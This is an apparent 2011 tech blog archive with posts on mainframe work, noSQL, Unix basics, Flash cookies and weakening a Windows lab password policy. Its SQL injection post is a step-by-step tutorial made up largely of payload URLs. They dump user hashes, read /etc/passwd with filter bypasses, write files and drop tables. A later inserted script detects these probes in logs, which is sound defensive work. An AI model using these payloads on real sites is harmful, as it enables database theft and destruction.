Monday, October 10, 2011

How Mainframe is changing Life?

After being trained in Mainframes with one of the premier organizations, TCS, I was sent to Chennai with the complete batch, given the shocking news just 2 days before we were due to join Ahmedabad. We were told that there were certain "Critical Business Requirements" and that, to compensate for these requirements, they were sending us to Chennai.


I thought it could change my life and that I was going to work on something really good and make myself worth working in TCS.


Now, I start my daily routine by waking up, doing my daily business, going to the office, eating, coming back, eating again and then sleeping. Oh, you might be thinking that I missed the most important part of my whole day, "WORK". But the truth is I didn't forget; it is not part of my schedule anymore.


When I joined a project, I started out doing some Excel sheet work. Then came some manual editing work on mainframes, and then came the most fascinating and admired "Cycles". I have to run one or more cycles every day of every week of every month. Nothing has changed; I just have to run them. Write the code in the most tedious way, though there is not much coding done now.


One was told to leave all his creativity and knowledge aside, start working like a dummy, ask no questions and follow the checklist perfectly. Now who cares if 80% of the world's code is written in COBOL? However, nobody told them that there are no new technological breakthroughs happening in mainframes and COBOL. You are asked to work like the other almost 50K odd people in the organization are working, like sheep and cows.


I wanted to work in Networking, but I was told "NO" at every point and passage I went through. I was asked to work on whatever was assigned to me.


I am not saying that everyone working on mainframes has the same kind of work; maybe it's just me, or maybe not. If somebody is happy with whatever he is doing, he has to keep doing it until he feels it's worth doing. I just wanted to let you know that this is what happened to me.

Tuesday, October 4, 2011

Yes to noSQL..!!


With Oracle diving into noSQL type databases, the buzz around this kind of database has increased. Oracle Corporation has announced that it is going to launch its noSQL Database soon. The ORACLE website says it would be available by mid-October for download, as it is going to be open source.

Now let me talk a little about noSQL first. noSQL can be expanded as "Not Only SQL". noSQL is a class of database management systems that have come up in recent years and differ from the typical class of RDBMSes. "noSQL" databases do not provide joins or schemas as RDBMSes do. noSQL scales horizontally whereas RDBMSes scale vertically.

A broad range of services over the Internet use noSQL databases. Netflix, Digg, LinkedIn, Facebook etc. are some of the big examples that have adopted noSQL as their DB of choice. There was a buzz that Wikipedia should also use this kind of DB, because it has a vast amount of data and this is the best solution for that range of data.

noSQL is a collection of key-value pairs. This can be implemented using any programming language, as key-value stores allow the application to store its data in a schema-less way. The data can be stored in a data type or object of any programming language. This also does not require any particular data model.

Now, let's come to the big question. Why use noSQL databases instead of SQL databases?
The reason is the volume of data they handle. Normal SQL databases are good up to 10 million records and then they start to become annoying. But if you have a billion+ key-values to be stored, then these kinds of databases are used. So these are best suited for forums, blogs and social networking websites, where there is a huge amount of data and the data needs to be fetched fast.
The much bigger question is: can noSQL replace SQL?
I believe this cannot happen at any point in the near future of 5 to 10 years. SQL databases have their own importance in the IT industry. They are reliable, much more stable and suitable to the needs of (most of) the customers. Although, both of these target different solutions to different problems.

But noSQL databases can be used in conjunction with RDBMS databases. Data like (username, Order, Money) can be stored in an RDBMS, whereas application data, social network data and video data can be stored in noSQL databases (as these require performance).
Some of the most popular noSQL DBs are as follows:
  • MongoDB
  • BigTable
  • Apache Cassandra
  • Neo4J
  • MarkLogic
  • eXist
  • HBase
  • db4o
The list may go on, but these are the most widely used...!!
The feature set of the noSQL Database as mentioned by Oracle is as follows:
  • Simple Data Model
    • Key-value pair data structure; keys are composed of Major & Minor keys
    • Easy-to-use Java API with simple Put, Delete and Get operations
  • Scalability
    • Automatic, hash-function based data partitioning and distribution
    • Intelligent NoSQL Database driver is topology and latency aware, providing optimal data access
  • Predictable behavior
    • ACID transactions, configurable globally and per operation
    • Bounded latency via B-tree caching and efficient query dispatching
  • High Availability
    • No single point of failure
    • Built-in, configurable replication
    • Resilient to single and multi-storage node failure
    • Disaster recovery via data center replication
  • Easy Administration
    • Web console or command line interface
    • System and node management
    • Shows system topology, status, current load, trailing and average latency, events and alerts.

Monday, October 3, 2011

Basics of UNIX


File and Directory Structure:
The directory structure of Unix/Linux based operating systems is an inverted tree, where the root (/) is at the top and the rest comes down hierarchically. The file system looks like:
  • / — the slash / character alone denotes the root of the virtual filesystem tree.
  • /bin — stands for "binaries" and contains certain fundamental utilities, such as ls or cp, needed by all users.
  • /sbin — stands for "system (or "superuser") binaries" and contains fundamental utilities, such as init, usually needed to start, maintain and recover the system.
  • /etc — contains configuration files and system databases.
  • /dev — stands for "devices". Contains file representations of peripheral devices.
  • /home — contains the home directories for the users.
  • /mnt — contains filesystem mount points.
  • /lib — contains system libraries.
  • /root — the home directory for the super-user root.
  • /tmp — a place for temporary files. Many Unices clear this directory upon start up.
  • /usr — originally the directory holding user home directories, its use has changed, and it now holds executables, libraries, and shared resources that are not system critical, like the X Window System, KDE, Perl, etc. (The name "Unix System Resources" is a post hoc backronym). However, on some UNIX systems, some user accounts may still have a home directory that is a direct subdirectory of /usr, such as the default as in Minix.
  • /var — a short for "variable." A place for files that may change often.
  • /proc — contains all processing data (Process information about a running operating system).
  • /opt — contains add-on software.
  • /media — default mount point for removable devices.
  • /srv — server data (data for services provided by system).
  • /boot — contains all the important files which are required for successful booting process.
  • /sys — contains information related to hardware.
For more information Please follow: http://en.wikipedia.org/wiki/Unix_directory_structure


Shortcuts of Shell
Following are the main shortcuts that can be used in the K-shell (ksh) on AIX for better productivity:
  • To navigate to the previous and next commands in the history: ESC + j and ESC + k
  • To move right to left and vice versa within a command: ESC + h and ESC + l
  • To insert characters into an already written command: ESC + h/l (to navigate) then i (to insert). Remember that the INSERT key doesn't work on the shell for inserting.
  • To auto-complete a file or directory name: ESC + \

VI editor
  • VI is an editor used to edit files on UNIX based systems. Following are the most used features of VI:
    • To open a file in the VI editor: $vi <filename>
    • Note: This will open the file if it is present in the current directory; otherwise it will create the file in the current directory if no directory is mentioned.
  • To insert into the file once it is open for editing: press i, press a or press the INSERT key
  • To quit the vi editor one needs to come to normal mode from insert mode. Use the ESC key to come to normal mode from insert mode.
    • :q! --> to quit forcefully
    • :w! --> to write the content of the last edit to the file, forcefully
    • :wq! --> to write the content of the last edit to the file as well as quit, forcefully.
  • Use Following commands in Normal mode:
    • :set number --> to see the line numbers
    • :set nonumber -->to remove the line numbering
    • /<word> --> to search the word in the file
Basic Commands:
Following is the list of basic commands that can be used on almost all the UNIX based systems and enhances the productivity:
  • $cd --> To go to the user's own home directory from any location
  • $cd <directory path> --> To go to the specified directory path
  • $cd .. --> To go one level up in the directory structure.
  • $cd - --> To go to the previous directory one was working in before moving to the current directory.
    • Note: Please note the SPACE between cd and .. and between cd and -
  • $touch <filename> --> Creates an empty file if the file is not present. If the file is present, the access time stamp will be changed.
  • $mkdir <dir-name> --> To create a directory.
  • $mkdir -p <dir1/dir2/dir3> --> To create nested directories. Using this, dir2 is created in dir1 and dir3 is created in dir2.
  • $rm <filename> --> To delete a file. One will be prompted yes or no when this command is used.
  • $rm -rf <filename or dirname> --> To delete files or complete directories. It won't prompt for yes or no before deleting the file or directory.
  • $man <command> --> To get information about a command. For example $man grep will give all the information regarding the grep command.
  • $cp <source> <destination> --> To copy a file or directory from source to destination.
  • $mv <source> <destination> --> To move a file or directory form source to destination.
  • $clear --> clears the prompt
  • $cat <filename> --> to view the content of the file.
  • $date --> prints the date on the prompt
  • $echo "String" --> prints the String on the prompt.
  • $grep <pattern> <filename> --> to search for a pattern of strings within a file.
    • Note: The various options of grep can be easily understood using the man page, i.e. $man grep.
  • $cat <filename> | more --> To view a file which is more than one page long. RETURN (ENTER) key is used to scroll one line and SPACE key is used to scroll 1 Page.
  • $more <filename> --> works same as the above command.
Shell and Shell Script
A UNIX shell is a command-line interpreter or shell that provides a traditional user interface for the UNIX based operating system and for Unix-like systems. The shell that a user is using can be found using
$echo $SHELL
/bin/ksh
This means that K-shell is used by the user.
The most widely used Shells are as follows:
  • Korn Shell --> ksh
  • Bourne Shell --> bsh
  • Bourne Again Shell --> bash
  • C Shell --> csh
For reading and referring to Shell Scripting, please follow the links mentioned below, as it is a long topic and cannot be covered completely here.
Use of $
Following is a list of how $ can be used in a Shell Script:
  • $1 - $9 --> These variables are the positional parameters.
  • $0 --> The name of the command currently being executed.
  • $# --> The number of positional arguments given to this invocation of the shell.
  • $? --> The exit status of the last command executed, given as a decimal string. When a command completes successfully, it returns an exit status of 0 (zero); otherwise it returns a non-zero exit status.
  • $$ --> The process number of this shell, useful for including in filenames to make them unique.
  • $! --> The process id of the last command run in the background.
  • $- --> The current options supplied to this invocation of the shell.
  • $* --> A string containing all the arguments to the shell, starting at $1.
  • $@ --> Same as above, except when quoted.
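The script below is an added example, not part of the original post, that exercises each of the $ variables listed above in a POSIX shell (sh, ksh or bash); the "$*" versus "$@" difference and the set -e caveat around $? are the parts worth trying yourself.

```shell
#!/bin/sh
# Added example, not from the original post: exercises the $ variables listed
# above. Assumes a POSIX shell (sh, ksh or bash) and a writable $TMPDIR or /tmp.

# $# : the number of positional parameters passed to this function.
count_args() {
    echo "$#"
}

# "$*" joins all parameters into ONE word; "$@" keeps each parameter as a
# separate word. Each function re-sets its own parameters with one form
# and reports how many words survived.
words_via_star() {
    set -- "$*"
    echo "$#"
}
words_via_at() {
    set -- "$@"
    echo "$#"
}

# $? : exit status of the last command. grep -q exits 0 on a match and 1
# on a miss. The command sits in an if-condition so that a script running
# under set -e does not abort on the miss; $? in the else branch still
# holds the condition's status.
status_of_grep() {
    if printf '%s\n' "$1" | grep -q -- "$2"; then
        rc=$?
    else
        rc=$?
    fi
    echo "$rc"
}

# $$ : PID of the running shell, handy for unique temporary file names.
# $! : PID of the most recent background job; after wait, wait's exit
# status is the job's own status.
background_status() {
    tmp="${TMPDIR:-/tmp}/dollar_demo.$$"
    ( exit "$1" ) &                # background subshell exiting with code $1
    echo "$!" > "$tmp"             # record its PID using $!
    rc=0
    wait "$(cat "$tmp")" || rc=$?  # "|| rc=$?" keeps set -e scripts alive
    rm -f "$tmp"
    echo "$rc"
}

# Demonstration when the script is run directly.
echo "script name (\$0): $0"
echo "shell options (\$-): $-"
echo "argument count: $(count_args one two three)"
echo "words seen via \"\$*\": $(words_via_star "a b" c)"
echo "words seen via \"\$@\": $(words_via_at "a b" c)"
echo "grep miss status: $(status_of_grep hello xyz)"
echo "background job status: $(background_status 3)"
```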

Sunday, October 2, 2011

Are you being Tracked??

As stated on Wikipedia.com "A zombie cookie is any HTTP cookie that is recreated after deletion from backups stored outside the web browser's dedicated cookie storage. This makes them very difficult to remove. These cookies may be installed on a web browser that has opted to not receive cookies since they do not completely rely on traditional cookies".

Almost all of the internet uses the Adobe Flash plugin to provide online video capabilities to the web. But this is not all it is designed for. More than half of the internet's top websites use a little known capability of Adobe's Flash plugin to track users and store information about them.

Flash cookies are used by many of the net’s top websites for a variety of purposes, from setting default volume levels on video players to assigning a unique ID to users that tracks them no matter what browser they use.

Websites can store up to 100K of information in the plug-in, 25 times what a browser cookie can hold. Sites like Pandora.com also use Flash’s storage capability to pre-load portions of songs or videos to ensure smooth playback.

Some Flash-cookie (LSO) properties in short...
- they never expire, staying on your computer for an unlimited time.
- by default they offer a storage of 100 KB (compare: usual cookies 4 KB).
- browsers are not fully aware of LSOs; they often cannot be displayed or managed by browsers.
- via Flash they can access and store highly specific personal and technical information (system, user name, files, ...).
- they are able to send the stored information to the appropriate server without the user's permission.
- Flash applications do not need to be visible.
- there is no easy way to tell which Flash-cookie sites are tracking you.
- shared folders allow cross-browser tracking; LSOs work in every Flash-enabled application.
- the Flash company doesn't provide a user-friendly way to manage LSOs; in fact it's incredibly cumbersome.
- many domains and tracking companies make extensive use of Flash cookies.

All modern browsers now include fine-grained controls to let users decide which cookies to accept and which to get rid of, but Flash cookies are handled differently. These are managed through a web page on Adobe's site, where the controls are not easily understood (there is a panel for Global Privacy Settings and another for Website Privacy Settings, and the difference is unclear). In fact, the controls are so odd that the page has to tell you that it is the control, not just a tutorial on how to use the control.

There are ways, if you don't want to be tracked. One cool way is to use Private Browsing, which is available in all major browsers. There are tools available that can help you delete all the cookies, but that is just for the time being, because technology is ever developing; who knows, something new comes up another day and it will take up all your important browsing history.

Tools :
* Better Privacy extension for Firefox -
https://addons.mozilla.org/en-US/firefox/addon/6623
* Ccleaner - http://www.ccleaner.com/

I could not find any tool for Chrome. While browsing all of the browser settings for Chrome, I only found "Delete all Cookies". This worked; it cleared all the cookies, including the Flash cookies.

Modify Windows Server Password Policy


So, while playing with Windows Server 2008 R2, I found the minimum password requirements to be a bit too stringent for a lab environment. If you find yourself in a similar predicament and wish to lower the password requirements to near-nothing (not recommended for production environments), then follow these steps:
  1. Open a command prompt
  2. Type 'secedit /export /cfg c:\temp.cfg' and hit enter
  3. Edit c:\temp.cfg in your favorite ASCII editor
    • Change the line "PasswordComplexity = 1" to "PasswordComplexity = 0"
    • Change "MinimumPasswordLength = 7" to a smaller value.
    • Save and close the file
  4. At a command prompt type "secedit /configure /db %windir%\security\local.sdb /cfg c:\temp.cfg /areas SECURITYPOLICY"
The new settings should be in place. Create an account and it won't bug you if the password is too short.

Friday, September 30, 2011

SQL Injection Discussed

What is SQL injection? It is a means of database exploitation through queries (SQL commands) in order to read database table contents and, mainly, to attack or gain unauthorized access to a system using the exploited database. A great number of modern websites suffer from this vulnerability, which can cause anything from simple information leakage to total compromise. So its severity is relatively high.



What causes this vulnerability? Improper sanitization of submitted input. SQL injections based on poorly filtered strings are caused by user input that is not filtered for escape characters. This means that a user can input a value that is passed on as part of an SQL statement, resulting in manipulation of the database query by the end user. Code that is vulnerable to this type of vulnerability might look something like this:

$pass = $_GET['pass'];
$password = mysql_query("SELECT password FROM users WHERE password = '" . $pass . "';");

Let's suppose a webpage http://www.victim.com/index.php?id=1. The first stage of the attack includes finding the number of columns of the database table. This can be done in the following way:
http://www.victim.com/index.php?id=1 order by x
where x=1,2,3 (1+), raised until an error message is returned. x-1 is the exact number of columns.

Next follows finding the names of the table and its columns, as well as any other tables and columns, using the information_schema. First let us understand the information schema.

What is the Information Schema? It is a major table existing in any PHP version database, including information about: table names, column names, users, databases, user privileges, privileges, databases. So to achieve this, two methods can be used, the union+select or the grouped by method:

http://www.victim.com/index.php?id=-1+union+select+1,2,3-- (or union all select 1,2,3--) 

At this point id=-1 and -- are met. The first one is the null value (null can also be used). The second one, --, means the end of the query; any text after that is just a comment. # or /* can also be used. The previous query means select names of 1,2,3 from any database; without the null value, the initial URL is just taken again. Also, words in the URL can be connected with simple whitespace, + or %20; the last is the hex character for space.

The second method takes advantage of id:
http://www.victim.com/index.php?Select 1,2,3 grouped by id=1--
Each time a number appears on the page, for a column and any other new information possibly related to column_name, that number should be substituted with the proper info. So in the following steps it is possible to read the column_names. The following step involves the information_schema tables:

http://www.victim.com/index.php?id=-1+union+select+1,2,3+from+information_schema.tables-- 

http://www.victim.com/index.php?id=-1+union+select+1,concat(table_name),3,..,N+FROM+INFORMATION_SCHEMA.TABLES+limit+0,1-- 

In the last query a new command is used, limit. With limit 0,1 the first table is returned. With limit 1,1 the second table is returned, with limit 14,1 the 15th table is returned, with limit 18,1 the 19th table is returned, and so on. The procedure is repeated until an error is returned. When the error is returned, all tables have been found.

More info about the database version, database and user can be gained by using the proper SQL functions in the queries. In MySQL version 5 and below it is possible to get MySQL root rights. These versions include a table named mysql.user containing hashes and usernames for logins, as in the following code:

http://www.victim.com/index.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/* 
Hashes are in mysqlsha1 format. To check what privileges a user has, the following query can be used:

http://www.site.gr/index.php?id=-1+union+all+select+1,2,group_concat(user,0x3a,file_priv),4,5,6,7+from+mysql.user-- 

The results are in the format Username:Privileges. Where Y appears there are the relevant privileges; where N appears, there are not.
http://www.victim.com/index.php?id=-1+union+select+1,2,version()--
http://www.victim.com/index.php?id=-1+union+select+1,2,@@version--
http://www.victim.com/index.php?id=-1+union+select+1,2,user()--
http://www.victim.com/index.php?id=-1+union+select+1,2,database()-- 
Although these functions are not columns of the database, they are placed in the query as one of the existing columns, otherwise a message about an improper column count is returned. The functions are inserted in place of the vulnerable field.
Modifying database content: After information is found about a database, either with SQL injection or Blind SQL injection (described in later lines), it is possible to modify its content.
Suppose the victim page http://www.victim.com/index.php?id=5 and the query (with column names): select title, article, author from data where id=5 (found by injection). So the table content can be changed:

http://www.victim.com/index.php?id=5 UPDATE table_name SET title='hacked',article='hacked',author='somebody'-- 

thus changing title, article and author. Or it is possible to delete one or more columns:

http://www.victim.com/index.php?id=5 DELETE title,article,author from data-- 
or 
http://www.victim.com/index.php?id=5 DELETE title,article,author FROM data where id=5-- (for id=5 etc.)

http://www.victim.com/index.php?id=5 DROP TABLE data-- 
This last query completely deletes a table. In the previous queries it was possible to delete any number of columns.

Putting the MySQL server offline: The command SHUTDOWN WITH NOWAIT is used; for example, take the following query:
http://www.victim.com/index.php?id=5 SHUTDOWN WITH NOWAIT;

LOAD_FILE
It permits viewing the contents of a given file. As seen in the following query, the function load_file() replaces the vulnerable parameter and is given the full working directory.

http://www.examplesite.com/index.php?id=-1+union+all+select+1,2,load_file('/etc/passwd'),4,5,6,7+from+mysql.user-- 

If this query returns an error, that means magic quote filtering is used as a countermeasure, with the server inserting backslashes before and after quotes. To bypass magic quote filtering, the file (directory) should be written in hexadecimal format, or each character should be replaced with its ASCII value, all values separated with commas (,) when using the char() function. When using hexadecimal formatting, that is specified in the query by inserting 0x just before the hexadecimal values, without any empty space before or after them. For example, the previous query using hex and char is written in the following ways:
For hexadecimal formatting:
http://www.examplesite.com/index.php?id=-1+union+all+select+1,2,load_file(0x2f6574632f706173737764),4,5,6,7+from+mysql.user-- 
For char() method: 
http://www.examplesite.com/index.php?id=-1+union+all+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7+from+mysql.user--

INTO OUTFILE
With this command it is possible to write a file into a given directory with a specific text. In the following example the file test. When using this method as above and more than one field (column) is vulnerable, the last is replaced with the query and the others with null. When return or enter keys are used in the text, it is written and transposed into char or hex. If magic quote filtering is used, then the text, just the text, is converted to hex.
The directory and file should be written precisely inside ' '. In the following example the query creates a file test.txt in the directory home/site/www/ with the text "testing" (http://www.site.gr/test.txt). A possible exploitation of this method is creating a vulnerable file inside a server and later attacking it with RFI.
http://www.examplesite.com/index.php?id=-1+union+all+select+1,2,"testing",4,5,6,7+INTO+OUTFILE+'/home/site/www/test.txt'-- 
Blind SQL injection
In this method conclusions are based on the difference between valid and invalid query results after our valid or invalid inputs. Because, unlike simple SQL injection, we don't receive any direct info on the page, this type of injection is called blind.

Suppose the page http://www.victim.com/index.php?id=1. We try injecting the following statements:

http://www.victim.com/index.php?id=1 and 1=1
http://www.victim.com/index.php?id=1 and 1=2

The first request always results in true, returning the initial page. But on the second request, in case there is no proper defensive filter, we get a false result, differing from the result of the previous request.
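From the defender's side, every probe this post walks through leaves a recognisable trace in the web server's access log. The script below is an added example, not part of the original post: it normalises the request URIs and flags the ORDER BY column counting, UNION SELECT, information_schema, load_file(), INTO OUTFILE, 0x-encoded and "and 1=1 / and 1=2" patterns, then reports which client sent a burst of them. The log lines are constructed for this example; only POSIX sh, sed, tr, grep, awk and sort are assumed.

```shell
#!/bin/sh
# Added example, not from the original post: flags the SQL injection probe
# shapes described above in constructed access-log lines. Assumes POSIX sh,
# sed, tr, grep -E, awk and sort.

# Constructed sample log in Combined Log Format (no referer/agent fields).
SAMPLE_LOG='10.0.0.5 - - [30/Sep/2011:10:01:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [30/Sep/2011:10:01:09 +0000] "GET /index.php?id=1%20order%20by%204 HTTP/1.1" 500 312
10.0.0.5 - - [30/Sep/2011:10:01:15 +0000] "GET /index.php?id=-1+union+select+1,2,3-- HTTP/1.1" 200 4870
10.0.0.5 - - [30/Sep/2011:10:01:20 +0000] "GET /index.php?id=-1+union+select+1,2,3+from+information_schema.tables-- HTTP/1.1" 200 5011
10.0.0.9 - - [30/Sep/2011:10:02:00 +0000] "GET /about.php HTTP/1.1" 200 2210
10.0.0.5 - - [30/Sep/2011:10:02:31 +0000] "GET /index.php?id=-1+union+all+select+1,2,load_file(0x2f6574632f706173737764),4-- HTTP/1.1" 200 6001
10.0.0.7 - - [30/Sep/2011:10:03:10 +0000] "GET /index.php?id=1%20and%201=2 HTTP/1.1" 200 200
10.0.0.9 - - [30/Sep/2011:10:03:40 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 3300'

# Probe signatures as one POSIX ERE, matched against the normalised line.
SQLI_RE='union[[:space:]]+(all[[:space:]]+)?select|information_schema|load_file\(|into[[:space:]]+outfile|order[[:space:]]+by[[:space:]]+[0-9]+|0x[0-9a-f]{4,}|[[:space:]]and[[:space:]]+1=[0-9]'

# Undo the two space encodings the post mentions (+ and %20) and lower-case,
# so UNION/union and union+select/union%20select all look the same.
normalise() {
    sed -e 's/+/ /g' -e 's/%20/ /g' | tr 'A-Z' 'a-z'
}

# Log lines whose request matches at least one signature.
sqli_lines() {
    printf '%s\n' "$SAMPLE_LOG" | normalise | grep -E "$SQLI_RE"
}

# Number of flagged lines. "union station" on the last line is not flagged:
# the pattern needs "union ... select", not the bare word.
count_sqli_lines() {
    sqli_lines | wc -l | tr -d ' '
}

# Client addresses with at least $1 flagged requests. The column-counting
# loop and table enumeration described above produce exactly this kind of
# burst from one source, which is the thing worth alerting on.
noisy_sources() {
    sqli_lines | awk -v min="$1" '{ n[$1]++ } END { for (ip in n) if (n[ip] >= min) print ip }' | sort
}

echo "flagged requests: $(count_sqli_lines)"
echo "sources with 2+ flagged requests:"
noisy_sources 2
```

Point `SAMPLE_LOG` at a real log (for example by replacing the `printf` with `cat "$1"`) and the same functions run over production data; the request bytes, not the response code, are what carry the signal, since the 500 from the ORDER BY probe is exactly what the attacker is looking for.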